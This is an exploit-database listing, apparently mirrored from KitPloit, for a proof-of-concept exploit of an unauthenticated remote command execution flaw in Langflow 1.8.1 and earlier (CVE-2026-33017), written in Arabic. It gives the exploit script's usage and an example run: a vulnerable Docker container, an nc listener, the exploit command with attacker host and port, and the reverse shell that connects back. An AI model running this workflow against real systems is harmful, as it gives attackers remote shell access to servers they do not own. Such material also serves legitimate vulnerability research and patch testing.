Sploitus

Exploit for PoC

kitploit · 2026-09-03

Exploit Code

MARKDOWN44 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MASTERWOK-POC-CVE-2026-33017
# إثبات المفهوم: CVE-2026-33017

Langflow <= 1.8.1 معرضة لثغرة تنفيذ أوامر عن بُعد (RCE) غير مصادق عليها (https://nvd.nist.gov/vuln/detail/CVE-2026-33017)

* * *

## الاستخدام

root@kitploit:~
    
    
    usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target
    
    PoC exploit: CVE-2026-33017
    
    positional arguments:
      target         Target hostname
    
    options:
      -h, --help     show this help message and exit
      --lhost LHOST  Reverse shell destination IP address
      --lport LPORT  Reverse shell destination port
    

## مثال

root@kitploit:~
    
    
    # إنشاء مثيل docker
    docker run -d -p 7860:7860 langflowai/langflow:1.8.1
    
    # بدء المستمع
    nc -lnvp 4444
    
    # تشغيل الاستغلال
    python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444
    
    # يجب استلام الصدفة العكسية في المستمع
    Listening on 0.0.0.0 4444
    Connection received on 172.17.0.2 42712
    uname -a
    Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux